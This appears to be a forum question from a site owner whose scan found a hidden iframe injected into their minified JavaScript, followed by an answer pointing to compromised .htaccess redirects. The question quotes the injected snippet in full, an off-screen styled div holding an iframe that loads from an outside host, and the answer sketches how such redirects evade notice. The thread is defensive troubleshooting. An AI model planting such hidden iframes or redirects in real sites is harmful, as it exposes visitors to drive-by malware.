# Rogue iframe injection in my javascript

Tags: linux, apache-2.2, javascript

I ran my website through Sucuri
http://sitecheck.sucuri.net/results/www.fort-aspenwood.com

They came up with these rogue iframes in my minified javascript

```
<style>.vpqfm { position:absolute; left:-632px; top:-729px; }</style> <div class="vpqfm"><iframe src="http://dhypzebl.serveusers.com/jquery/get.php?ver=jquery.latest.js" width="458" height="424"></iframe></div>
```

I've searched everywhere and can't seem to find which javascript file thare are in, nor are there any strange php codes in the index or anywhere else.

Any thoughts?

Answer (score 0):

Check htaccess in all directories of your site.  It is very common for automated scripts to steal FTP credentials and update .htaccess to redirect an asset (such as JS) to a server that serves your original content plus a payload.

They are pretty good at hiding this: it will set a cookie and only redirect each user once and target specific OS/Browser types, which makes it pretty unnoticable.